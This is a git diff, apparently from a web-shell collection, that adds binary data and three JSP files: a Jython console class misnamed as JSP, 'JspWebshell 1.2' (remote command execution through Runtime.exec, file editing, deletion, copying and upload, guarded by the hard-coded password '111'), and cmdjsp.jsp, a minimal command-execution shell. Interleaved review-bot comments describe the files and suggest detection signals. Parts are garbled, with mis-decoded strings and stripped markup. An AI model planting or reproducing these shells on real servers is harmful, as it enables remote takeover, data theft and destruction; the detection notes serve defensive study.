ze4I+yKMje3?XniSXCOG$7^A!M^!6Q4s5kHhOxO#;x_zUK?N6uPhu&$#L2$hjd@LCY zY3jA$&CChZ(=EWCSzfg%C9AuAhp>hMJ(eAZb1Vzev3PuhtCp8zcgy!XRGek0{Zk@|ceq%8eZ zFzDi!;aqhTZiN-Wx}nzBeIY9y!dPt-Il+?9G4oR+wt~z|RZMh@FfYdD-9<^WyMS`w)S=MIl4W9M6tirxcWylI{E? 
z{XzqI**VEh`W1eM_M3~HFtHJqf=hoXv02~H4bWcpfF0yjU?avCgI$6d!_~`h-B(#M zRlDcHZ*LDrBS&)q40^lf<3uhZ&Zpx?X52dvBUjNKzQU834LKH zx~#-mtAIhBixKEJt?_ZhoM3Fop8NoQCo!@%{DTK~TpZy`I$1i#k^=*gPdKrs+Mr*l z$TZ<=oQ19`DSxF!FQ<5dyO>nkKHl~;-k){DVeA)dUAuMd& z;ES}%JOK;f4SaCneGfsyQF2b8Q;DWJfYf3K@%DVgI;YOUFa0?+GzRE=;>kv>kRaq6 zEE?GCh3zD!nC*WXDhn@VmZDru!y{2Nwj;}mR|Yh{8_3v$xGA&10eB7ut~g=yzL1b# zZVS*}k=Fl zl{!=^wOJ4J3K&`UMD05S*^qn^EgVYWb0)Q0=kR7ZY;JKbwHG$rn>h`~o7R$4!bLwIy*Gg_#GgnieZwsj?uvaU;#ZzsxlrC33AoTL7zNHQ-qNlT-aeZjF+ zoWu3(iZY(w{Y*CR@B>zgbEexyV#vh`t-Y63!0asZ9K^%NL9x5mvyWBVj4O+76UM>! zMgi?QSir}B0_{drqCZpmwon$`$2FTr+Ha?H3^AL8I!>XmTlq@+{V-dI@mTd``KnBM z3@Ni}54P{byNFOxebSRk{gj8J5$lza>a}N4aqz@h0GGX+bNU41=36|~uap7w^Eb1e zIU~tuUzcA8W6{%KZ`Xm5{jnjz#%bMg1!A6fV<2^ld_p$K7e1rJDNW1~d{=E*Oi6xj zidj{8HsTy_w8ktI`-0g%YK(o?+4wK9$kf9ms$H=?7tz@SNjW6OSq^TWJwu$)q_Thk zL?*Fq&?3YFzQTCRD@4(8y(CfQq+x;%5E(m3TiVUsSCQ>a%oVgw6KADv0qsQ ztlTS$%~7n@8(arl$m30mS!GOiL69rnCCJp!i>{lD+u~5UGVF8jUKs`CMG`{>*4xvg=_OAT)|i za{c8L^RVGZPl9-ZkZH~(Z_TCAOFSSjA}i3rs3d#+TFR6k-}A7h3;P?ntK`M%R+y#8 zG*D5V>46j(P%ikd`AY1VVeH_t#qO*TX8ol~{HT)VfsVydY=+?0#c7<4R7Pm`f5W9n z_N*N7LiFuWn+tO_6N*T~XEc%6Eow`MINzBD%GvI~PEpr%ds{XVWf-d=sOXli$ny?^ zft>ahB_{BwBeAKqXRqr#mnZQ z$*cp?WpYiD)}re#Yb=mAz-n9`&(uLPQW!#@W?mtw2$dRTU;~sz4B5S0eMq5%Sx1?n zs%I1|-^>YV{cbtKQZDG5jq9P;I5bUSHcN~pBWv>TLn5REB`@u-Rl%Fqp+47x%2NSp zi$+ZLsv`XGyyuo3a<`avf1#Sam8nI2j12AhR^af|We4(#WlA z4A&rhU!ytcOy3?%_oTiZP8~)LlLuI%Z1`L9*mqN}#dok{Y}8vGA4_;IeHG#|6nACS zkw~5twXfwnR0>L`(1M@r<3N?8#ZpP3&=>k`^Is%#%iCNRcvD%Q4~5Q_ObNs1ciA7q z_oeXkUysC#c$Pq+^}|H5%Pnp%cvF8l$e#c5?Qwq%02BH(SI3 zaHSd{PDCsHPK7WoRD;2OMG`!Lru}{LSm>-8HEvrY;7jrZ_=6fV-l}dK&!MIGs`f4k zN;wh2i3Dp^QsUWZ_>UT+M43Z91C^reGLUIO0M}M!HU+T{)f<oF87$3XFV@A9s;nfRSZ3?9~uAlW0-dsJ8 z2zyQu_r9M^kZKP60ctqRI6YC$=;$wm@Tc6FL}om z`{3p5dy6tyM$n{^;>kP56q zzTGTt;6L4c@&AIm|Fiyozw*DpwM8wgP5y253m&7h{l`#ODy{IsWIwOT*HEoegeJiO z-RBqtY1ACldR=H_U!0vgBoU5=UOfnsXyKA~5}T0<{Q9Z?ESkqa45na*-?LFAF`b^* zjm|NzZC(|b$gUnQni6%|7Z@G`8LdQ;kNd1%>3oL|+cGK( 
zN?H@me2GUj7!at>qG+mo^y+R%wabbmU`>AF)2^!+yvijrXLaTu^fOrc$zTp_x?mb# zOy)Q(W}bL_$Rcw{xP_9qglp_E2%>8Iqw1W(qiG(-lKa6Z6Y40`2E3}O2 znkcp-A7x3TOdz}U_g2LOHmpcPaYllyMMkkw%U7t9F{g+0D#MJ-5)f>6*z#k>Hq379 zvRjcOkufeF@fls`(X2Fg0^Hn^^h1ru!{O9rss{<3!czn4I`1!pRlkj7njNh=yp5U! zL2j-5v)oz_!*_1$NruDl&TdRqrTJIeBdm7Pt465hw?XC1Zjv|a&YS>}CmxpwFfUae zF3XAwSkY_VCkmP+=)qIJT89fjl4l71HoeHsRIo&Tvu@al@#LAB!0zYl+)~1Zy0Rl5 zHET-PBI)B_7sZd7tG+(v5DQ$Yg$HunK!tt9mFlCNF1L#Sr`)>Bt-;~Rw2MbEX$*q8 zTis>J77$S%KHgigV~BHS(;??Y?$xnYyhJqZd@6a41 z51d@PHT{0(IDLR0d(~qWoPU@1tmdJ806d!sbBDYw@;$yHMd?v;QzJ{x1f1DW3Jxou zG3AvjXPMV%|AW|4aQKJ#5fGh?AFrvajDA~!ftqI7(d%>$XA$DBdOBcoj1y*Ig_M`xza}L7L#)D;F|myVem5uPA-Yl zRX^HR;^b0=<8SnE6Dcd1#vAWOqdnnZp~8iwhvu1EaqDq|zQ*<*B z8VTZq?bgSbZjrzPcBe{a_A2_svd4)0res(|cc|AhMJKk?$oi1R%Z@D%nqIuL{xnPQ zabR$PUV=ekm;uN{QxpgCg=edZ7QnISo7-ZOrBJsD)|84^u8YB+E>!)Kw|80=+#-9( zf>3Vauy3X+0zt`%COlEet6*&ezpLs~e#14>jkSb~K1C-rYnhk6A?$~jDj6fl^SgSI zY%D2_?SN>HI?8@l4de{S?g<-xj#lyzUC^^U?;)ROsuZ2b#b^!FVlHWj;I(Un+xEifCaTU|Q3- z?8~h99S&7Df1fQ-%9gwEjx;5)>W8}#Aj~3M8lKgdNQ5670~gdT+VCj9<-Kb>L}IUb zp}vc7!6y0W`5ZSc#{QA5m@26#(#t`aFT3Z@Nnx)YI$s4N0JQ1uD{8}}2vg_?s3TmT z5Q2S;udq{wM>?p!LV&oFCRWb_x(&5KN{>IVr?5`Mwle0Z_>S{}9yc{Q@!uF$y0B$R zv>Iuvn8kG*NoEhb8%-OEsigCuScfaBdKLdq5Qn{Zb()guswq9Lz>#75%SiZLgi ze8pPtpeKiE#JFgDp7m-vB~HUWW!6eju*tcN{wXL1O4F%Y`ty?keyMi^=nKRGjcP}u zne!aru!eA569S+w z_Xpml2Xhm=%z0%o)Ro*OJ{2TkgpB#iG!d~!Z-`N5JC9agulK;gv%BEaU+&)OaW&)4kYzUQg33=rgy@s~Le#jZY^@m}$`}4kc?UODbKY6;&XD8bQI}g?T z%k^JL%*4XfSH#%NON_+xB<0G$do{z#75l>vh6*Grfhe_ok^XE8U#0!N8YX`gQPNYR z>sHWFN>b$uj?ox!y-d0S8P{8Wpw2Ofe^P&geYhTIE>5bioM;=H{UncxCn;~je8 z66o)!L(OQE+6pq}Y}KMka1#j&&Qb*j1uZ5fkMgmpDB~}jHoCtb1Pj&S+-$T1espzV zfiksGqna7VGy^1kq|}s$lyefk&5Ka_5R~ zyjqTHsJBb5k9IHFnAIA0Q09@@qDZS2ob&tKr$dFxidca*dU1Wh&rx7?p&Dd85y&Q< zh3L^}LII53+4uz?IzdijtPVMWkVtbqn@M-I2*5M2fZX_)8xttAV!Le8*US5wHOL!@ z_0cU2TPlrAi^*nE{{q3L%WH!Z&M@@oa*lfFRXSD~97pXF#RYGhGZh!uv>gKZ74Mmu zE1*(IhW*wZJ4oqZkqC7Nd@a$hsV<##k4`{FnGc_2`-6RZa`ky{E2Y&3YCx>-2h&3S 
zjW)aowxX9#AIWXi6(nwNsns;e{=D!O?+Br5P8!5)Z>_sCg5H_+TlKUB*(}}(AfwDb zgn61-P0dAnvyh%Wp8g~;Hp_3~#i+Zlnu1!c!5F&H`qd!$-y@#!J3k`O0wD5d3RwIf zqx|v3=C}V8ffD~eh(M=*t3aV+bj|-zfidI7Cd(JXI_dlBaWYJ_duP zd-m4gg;{ARJzwo7zldbsoiINRkZ(vNzq{8KJqYp6Ro2{MX5uT3>ruCoWV=f+8aj;$ zv=eE!*-lAWZY#!Wti<8p%bhw5o7Ct2&Xq#DBeO9?Nkqpl&ZY?2HEXglm>(-bbDQH# zJd?}eg1-8hldiILqR znrNs!xKeoBVNXNq#I@Q2W$FF>FstnGHod&xRgemMm&zXW61twlFR!{rfECgxV)oN= zy$hqJu!cf3|At>*Wu|tV$3jn26l)Dz@;1M`Zoh)!NyzO)*so?LG|z+W564g$z?Dnx z;6MVLP}9@=-}dT7iF`Sp$f_PVpa}Buuk)PL>IiorhtmrfR`5zvV>kFb=u|!oI`Zt1 zz7DA{B-C;m!$C@W)8ljT{nkz}8VI7fRclWvJU$vAK%2AzhW~BEpfjt`|>v0Y85} z1LrczgtUO~EU4bp5PkL;<=Ni}A4|xH53PLH+0DJH4tBn46CeP6+TfmepMzxfioBIz z-xt7db5A!MNZn$H&s=Ta#MI>?m_*&a6WP4gR~d3@d@iwt2;Ips&qXf+Jm+Xsm&lNH zgy}-a&!0K<20o%~@i;4;2l7)eiSY9FSf+16v-~Pv_bmw+*C&I&88v1m`!E)DIM9xR zUe3Uj9x&Qm@;=5mIf=c31x%JcYu&_8Yp|o$8tGZq>xC=i?KzV0m(?pJl4&e^wW-?g z!Em#C>i=DNAIT$SeqKt*rMR@~jA#o_m_-oxYvJFVueu**duoGh$r{X0(G)^3_XuK zpRC%cO{#d?25rv@ZU&He|5c}t$#LfAqMimnJO@wx-ABgCXxGZ%Gb;dTn9q|Q4FXlrdnnjy<`t`*nPShu zM@^T+A#X~n;HtuIih&dN0?d`5j4$eW^&DC<9rywwfq$wjZ>@mmY?5dBLTWv>rP%ld z7Q86|>TtE`%QWsa)F)xwzmAATfGOhVJ2Zcum>PxO(sE{`Q!8;!+}5{^exwT0zMp-2 z^>Ur~IyY7Ry8zIamoKMCXYBEX)in#7Or0G3ye8|J(!@p}@m1S70_lUUP0<$zz4z}n z_C)q=@`G2SB*O9+hq7T+Uz^9uxW<**4ark6-w2SWbxyUNek9@-Q33LvCpXIRQSU!(ry3J1|fu3buj#)1M2i zT%(w?R5Gm~KcEcbGt_Nj%*R zPZfw)A$+6_B?^j92To^S#Y7{pv@|kDW0y}uvJsYs;}+Vq@)olPD5B5W>K8AIy}R3v zi;8pQSU6N-s}}8Kb^V6DIuLt7%?8VYgO?od?;>@9Vd8x~TJ{5s^@r@UoBBnJ(vdo{ z&es6~kTjkchf*?}!}0f0BD+!-WfXR{f!}(RDB~T}I~^bzy_H9}?xFBFxXbaoiX7rB z_g^H}F0w{bjS9nxu1GM4{+5iC=G9U4S5yC2dv_WQ# zmy&X=9g<9TDJNyQh|5R_X>ha5*k?wT!9>P3wy|F_WXsaX)^s!6hkLvCo_n18=Jw{E z^SpS@dEPwF`Jey!{+~C`@ALbOqhyG^odf~t8CIVWCxm8nD)tPldKK2S8e1BuZi_%P zN(gSBO~8I~smnEoMc5pAq53#FB!6^Dfx881=K`&_*0~Wrgv|+H#@)$w@QQ=v`{{BG zo!BXk$fcwdLTx1_)G-M?=>>YR51$yx*sYIqj$TN4$u%@tdihE0yfJ^;N!N>(E6+7Q zba$*w`>CA}$!ufH=EmLPV4Lrwq~3eeh{4JIgrJHfM~UClA`?>;cBr8pR4Q`n9B(*% zJ!6Ia(w`^Y=?rkvef9$!mjCgj?}s|fK-2-E4iI&Kr~^bDAnE{72Z%aA)B&On5Osj4 
z14JDl>Htv(h&n*j0iq5Nb%3Y?L>(aN08s~sIzZF`q7D#sfT#mR9U$uXMyNvw0sQd} zW|#!bL?k0n+hPiV8vkC~a^>6o@iq!}b%*5|GPt^CN!)iQr9$`lz?%5v0?n<)~aM*h+w&M()NePt#vjc%W%_(rw0D_b@$ z)H0baSHEsARh6lYNIC2ua5%(zE@9zwmcXd?A-9w^$4*B?__~f#)HK9G>uglqFbhMX zjf$S=G5$GMr%EnTa>I9zr%XIpZK=AlgK9>V3c}SoTmo=(&{aWaHUD8AN?449cbZ8w z{H=w3LhRt&SPis6bZ6NNsJHh;m7AQMuykcIuBK21Y%-_TWKAPJ4x+y{FD@_wHr9jz z1vJ!twp%o`=%uR0{-_Y>`78C$jg^=GYj%pfysx{noA=jYC}O~LkF8IWsF;IoYq7H< zM(f?7SY@9T{&r@en6eVBv5(Uw7?)x)w}xRYgBc|G8a+cQv7KTq8p7%>@{CTO96DXo z5wXKGcka^t7rgwErPB^##^o8s5msJ!RB$vaF|&*@>=1T6-Wqq@PsD3EhG5~j&90QQX--Co{FqbG_k-nyF^u- zZ=Fyqml>~EI$GL{34L9^#_f74>pLPR+jQ#~_a#W<7z%6Z*N>=dhV&8}@~H z$Bp;q3hRd9Ba8I4;gK`i_7hBjGz{IsK-W#^xTms&pM^>Sxo4!?BH)74vm%&EJ~NSc zG9D#$?0~5QOrxMfPKetxX{TG@vYYjtAFgkRac+y7=NvfGD0{_` z1$`qD-b|2n;Mbg`+@6cGO02F=f&M8-<)FLoT4bTfgiakaa~{RbkC6(qAaHk@yo_0j z?zMTaU^vT*zaePE8_#+zFAa&#gT1Ku;)`n2^?m&Y zWNL4J4app68NGXl%pu}h7u)d-MO8V-oQ`)@1?|}G!LFjgPr2yb_qNjs4H#Z{FMG`UAbNeM@JwOKXTNXbRljNvG_x_093yK5)=%dyQJ_`1G<>5Ac8bnVZCA`-2w kyJfoL3wF2)-%cFptEk1|vCX@y;b7Z$na$@zcdKH51K2vZnE(I) literal 0 HcmV?d00001 diff --git a/jsp/hackk8/JSP/Java Shell.jsp b/jsp/hackk8/JSP/Java Shell.jsp new file mode 100644 index 0000000..f15e864 --- /dev/null +++ b/jsp/hackk8/JSP/Java Shell.jsp 
@@ -0,0 +1,125 @@
+package enigma.shells.jython;
+
+import java.io.*;
+import java.awt.*;
+import javax.swing.*;
+
+import enigma.console.*;
+import enigma.console.java2d.*;
+
+import org.python.core.*;
+import org.python.util.*;
+
+public class JythonShell extends JPanel implements Runnable {
+ public static int DEFAULT_ROWS = 20;
+ public static int DEFAULT_COLUMNS = 80;
+ public static int DEFAULT_SCROLLBACK = 100;
+
+ public PrintStream out;
+
+ public Console console;
+ public Java2DTextWindow text;
+ public JScrollPane scrollPane;
+ public PythonInterpreter interp;
+
+ private Color colorBackground = new Color(0, 0, 0);
+ private Color colorForeground = new Color(187, 187, 187);
+ private Color colorError = new Color(187, 0, 0);
+ private Color colorCursor = new Color(187, 187, 0);
+
+ public JythonShell() {
+ this(null, Py.getSystemState());
+ }
+
+ public JythonShell(PyObject dict) {
+ this(dict, Py.getSystemState());
+ }
+
+ public JythonShell(int columns, int rows, int scrollback) {
+ this(null, Py.getSystemState(), columns, rows, scrollback);
+ }
+
+ public JythonShell(PyObject dict, PySystemState systemState) {
+ this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
+ }
+
+ public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
+ super(new BorderLayout());
+
+ text = new Java2DTextWindow(columns, rows, scrollback);
+ text.setBackground(colorBackground);
+
+ scrollPane = new JScrollPane();
+ scrollPane.setViewportView(text);
+
+ add(scrollPane, BorderLayout.CENTER);
+
+ console = new DefaultConsoleImpl(text);
+ out = console.getOutputStream();
+
+ interp = new PythonInterpreter(dict, systemState);
+ interp.setOut(out);
+ interp.setErr(out);
+ }
+
+ public void run() {
+ int pos = 0;
+ int tbs = 4;
+
+ String line = "";
+ String command = "";
+
+ for (;;) {
+ String space = "";
+ for (int i = 0; i < pos * tbs; i++) {
+ space += " ";
+ }
+
+ try {
+ console.setTextAttributes(new
TextAttributes(colorCursor)); + + if (pos > 0) { + out.print(space + "... "); + } else { + out.print(">> "); + } + + console.setTextAttributes(new TextAttributes(colorForeground)); + + line = console.readLine().trim(); + if (line.length() == 0 && pos > 0) { + pos--; + } else if (line.endsWith(":")) { + command += space + line + "\n"; + pos++; + } else { + command += space + line + "\n"; + } + + if (pos == 0) { + interp.exec(command); + command = ""; + } + } catch (Exception e) { + console.setTextAttributes(new TextAttributes(colorError)); + + e.printStackTrace(); + command = ""; + } + } + } + + public static void main(String[] argv) { + PySystemState.initialize(System.getProperties(), null, argv); + + JFrame frame = new JFrame("Jython Console"); + JythonShell console = new JythonShell(); + + frame.add(console, BorderLayout.CENTER); + frame.pack(); + frame.setVisible(true); + frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + console.run(); + } +} \ No newline at end of file diff --git a/jsp/hackk8/JSP/JspWebshell 1.2.jsp b/jsp/hackk8/JSP/JspWebshell 1.2.jsp new file mode 100644 index 0000000..4ce0fcf --- /dev/null +++ b/jsp/hackk8/JSP/JspWebshell 1.2.jsp @@ -0,0 +1,788 @@ +<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %> +<% +/** + *
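Review bot: The content added as `Java Shell.jsp` is a plain Java class (`package enigma.shells.jython;`, a Swing `JPanel` with a `main`), and the hunk contains no `<% %>` scriptlet or page directive, so the `.jsp` extension misstates what the file is. Anyone triaging this collection by extension would count it as a server-side web shell; from the imports it looks like a desktop Jython console that needs the `enigma.console` and `org.python` classes, though that is inferred. I would store it as `JythonShell.java`, or open it with a comment such as `// Sample: standalone Swing/Jython console, not a JSP; passes console input to interp.exec()`. Separately, the `catch (Exception e)` in `run()` calls `e.printStackTrace()`, which writes to stderr and not to the `out` stream the panel displays.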

Title:JspWebshell

+ * + *

Description: jspվ

+ * + *

Copyright:[B.C.T] Copyright (c) 2006

+ * + *

Company: zero.cnbct.org

+ * PS:СܴȤдϵQQ:48124012 + * @version 1.2 + */ + String path=""; + String selfName=""; + boolean copyfinish=false; +%> +<% selfName=request.getRequestURI(); + // String editfile=""; + String editfile=request.getParameter("editfile"); + if (editfile!=null) + {editfile=new String(editfile.getBytes("ISO8859_1")); + } + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); +%> +<%! + String _password ="111";// + public String readAllFile(String filePathName) throws IOException + { + FileReader fr = new FileReader(filePathName); + int count = fr.read(); + String res=""; + while(count != -1) + { + //System.out.print((char)count); + res=res+(char)count; + count = fr.read(); + if(count == 13) + { + fr.skip(1); + } + } + fr.close(); + return res; + } +public void writeFile(String filePathName,String args) throws IOException +{ +FileWriter fw = new FileWriter(filePathName); +PrintWriter out=new PrintWriter(fw); +out.write(args); +out.println(); +out.flush(); +fw.close(); +out.close(); +} +public boolean createFile(String filePathName) throws IOException +{ +boolean result = false; +File file = new File(filePathName); +if(file.exists()) +{ +System.out.println("ļѾڣ"); +} +else +{ +file.createNewFile(); +result = true; +System.out.println("ļѾ"); +} +return result; +} +public boolean createFolder(String fileFolderName) +{ +boolean result = false; +try +{ +File file = new File(fileFolderName); +if(file.exists()) +{ +//file.delete(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +else +{ +file.mkdir(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} + +public boolean DeleteFolder(String filefolderName) +{ +boolean result = false; +try +{ +File file = new File(filefolderName); +if(file.exists()) +{ +file.delete(); +System.out.println("Ŀ¼ɾ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "\"" + cmd + "\""; + } finally { + return retStr; + } + } + public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} +class EnvServlet +{ + public long timeUse=0; + public Hashtable htParam=new Hashtable(); + private Hashtable htShowMsg=new Hashtable(); + public void setHashtable() + { + Properties me=System.getProperties(); + Enumeration em=me.propertyNames(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=me.getProperty(strKey); + htParam.put(strKey,strValue); + } + } + public void getHashtable(String strQuery) + { + Enumeration em=htParam.keys(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=new String(); + if(strKey.indexOf(strQuery,0)>=0) + { + strValue=(String)htParam.get(strKey); + htShowMsg.put(strKey,strValue); + } + } + } + public String queryHashtable(String strKey) + { + strKey=(String)htParam.get(strKey); + return strKey; + } +/* public long test_int() + { + long timeStart = System.currentTimeMillis(); + int 
i=0; + while(i<3000000)i++; + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + } + public long test_sqrt() + { + long timeStart = System.currentTimeMillis(); + int i=0; + double db=(double)new Random().nextInt(1000); + while(i<200000){db=Math.sqrt(db);i++;} + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + }*/ +} +%> +<% + EnvServlet env=new EnvServlet(); + env.setHashtable(); + //String action=new String(" "); + //String act=new String("action"); + //if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act); +%> + + + + +JspWebShell By + + + + +<% +//session.setMaxInactiveInterval(_sessionOutTime * 60); +String password=request.getParameter("password"); +if (password == null && session.getAttribute("password") == null) { + +%> + +
+
+ + + +
+ + + + + + + + + +
 8JspWebShell + version 1.2¼ :::...Power By +
+ + +
+ +<% + + } else { + + if (session.getAttribute("password") == null) { + + if (validate(password) == false) { + out.println("
  • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } +%> + <% + File tmpFile = null; + String delfile=""; + String delfile1=""; + String editpath=""; + delfile1=request.getParameter("delfile"); + editpath=request.getParameter("filepath"); + if (delfile1!=null) + {delfile=new String(delfile1.getBytes("ISO8859_1")); + } + if ( delfile1!= null) { + // out.print(delfile); + tmpFile = new File(delfile); + if (! tmpFile.delete()) { + out.print( "ɾʧ
    \n"); + } + } +%> + <%String editfilecontent=null; + String editfilecontent1=request.getParameter("content"); + // out.println(editfilecontent1); + //String save=request.getParameter("save"); + if (editfilecontent1!=null) + {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));} + // out.print(editfile); + //out.print(editfilecontent); + if (editfile!=null&editfilecontent!=null) + {try {writeFile(editfile,editfilecontent);} + catch (Exception e) {out.print("дʧ");} + out.print("дɹ"); + } + %> +<%request.setCharacterEncoding("GBK");%> +<%//String editfile=request.getParameter("editfile"); +//out.print(editfile); +if (request.getParameter("jsptz")!=null) +{%> +
    +
    + + + + + + + +
    ز +
    +
    + + + + + + + +
    JAVAز +
    +
    +
    +
    + +<%} +else{ +if (editfile!=null)//if edit +{ +%> +
    + + + + +
    +

    ַ + +

    +

    + + +

    +
    +

     

    +<%} +else{%> + + + + + + + + + + + + <%=path1%>" ENCTYPE="multipart/form-data"> + + + + + + <% String fileexe=""; + String dir=""; + String deldir=""; + String scrfile=""; + String dstfile=""; + fileexe=request.getParameter("fileexe"); + dir=request.getParameter("dir"); + deldir=request.getParameter("deldir"); + scrfile=request.getParameter("scrfile"); + dstfile=request.getParameter("dstfile"); + if (fileexe!=null) + { + //out.print(path+fileexe); + createFile(path+fileexe); + } + if (dir!=null) + { + //out.print(path+dir); + createFolder(path+dir); + } + if (deldir!=null) + { + //out.print(deldir); + DeleteFolder(deldir); + } + if (scrfile!=null&dstfile!=null) + { + //out.print(scrfile); + //out.print(dstfile); + copyfinish=fileCopy(scrfile, dstfile) ; + } + %> + + + + + + <%//ϴ + String tempfilename=""; + String up=request.getParameter("up"); + // String tempfilepath=request.getParameter("filepath"); + // out.print(tempfilepath); + if(up!=null) + { + tempfilename=(String)session.getId(); + //String tempfilename=request.getParameter("file"); + File f1=new File(tempfilepath,tempfilename); + int n; + try + { + InputStream in=request.getInputStream(); + BufferedInputStream my_in=new BufferedInputStream(in); + FileOutputStream fout=new FileOutputStream(f1); + BufferedOutputStream my_out=new BufferedOutputStream(fout); + byte[] b=new byte[10000]; + while((n=my_in.read(b))!=-1) + { + my_out.write(b,0,n); + } + my_out.flush(); + my_out.close(); + fout.close(); + my_in.close(); + in.close(); + // out.print("ļɹ!
    "); + } + catch(IOException e) + { + out.print("ļʧ!"); + } + + try + { + RandomAccessFile random1=new RandomAccessFile(f1,"r"); + random1.readLine(); + String filename=random1.readLine(); + byte[] b=filename.getBytes("ISO-8859-1"); + filename=new String(b); + int pointer=filename.lastIndexOf('\\'); + filename=filename.substring(pointer+1,filename.length()-1); + File f2=new File(tempfilepath,filename); + RandomAccessFile random2=new RandomAccessFile(f2,"rw"); + random1.seek(0); + for(int i=1; i<=4; i++) + { + String tempstr=random1.readLine(); + } + long startPoint=random1.getFilePointer(); + random1.seek(random1.length()); + long mark=random1.getFilePointer(); + int j=0; + long endPoint=0; + while((mark>=0)&&(j<=5)) + { + mark--; + random1.seek(mark); + n=random1.readByte(); + if(n=='\n') + + { + j++; + endPoint=random1.getFilePointer(); + } + } + long length=endPoint-startPoint+1; + int order=(int)(length/10000); + int left=(int)(length%10000); + byte[] c=new byte[10000]; + random1.seek(startPoint); + for(int i=0; i + + + + +
    JspWebShell + version 1.0(վĿ¼:<%=config.getServletContext().getRealPath("/")%>)
    + <% + File[] fs = File.listRoots(); + for (int i = 0; i < fs.length; i++){ + %> + ش(<%=fs[i].getPath()%>) + + <%}%> +
    +
    + + +
    +

    + <% + String cmd = ""; + InputStream ins = null; + String result = ""; + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command");result = exeCmd(cmd);%> + <%=result == "" ? " " : result%> + <%}%> +

    + JSP̽
    + ļ + + +
    + ļ + + +
    + ļ + Ƶ + + +
    <%if(copyfinish==true) out.print("Ƴɹ");%>
    + <% try { + //path=request.getParameter("path"); + //if(path==null) + //path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%>     ɾ
    + <% } + + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +  
    + <% try { + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%> + <%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">༭ +   ɾ
    + <% } + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +
    +

    Power By [B.C.T] QQ:48124012

    +

     

    +<%}//if edit +} +} +%> + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/cmdjsp.jsp b/jsp/hackk8/JSP/cmdjsp.jsp new file mode 100644 index 0000000..2bd63ba --- /dev/null +++ b/jsp/hackk8/JSP/cmdjsp.jsp @@ -0,0 +1,31 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
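Review bot: Nothing in `JspWebshell 1.2.jsp` documents what it does, and the behaviour an analyst needs is spread over 788 added lines: `exeCmd` hands `request.getParameter("command")` to `Runtime.exec`, `writeFile`, `DeleteFolder` and `fileCopy` act on paths taken from request parameters, and access is gated only by the hard-coded `_password ="111"`, cached in the session attribute `password`. I would add a header comment listing the request parameters the page reads (`password`, `command`, `path`, `editfile`, `content`, `delfile`, `deldir`, `scrfile`, `dstfile`, `up`) so that detection rules and log searches can be written from it. On the host, the matching signals are the servlet container spawning a child process and new or modified files appearing under the web root. The markup in this rendering appears to have been stripped and the non-ASCII string literals look mis-decoded (the page declares `charset=GBK`), so content signatures should be taken from blob `4ce0fcf` and not from this text.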
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
    +
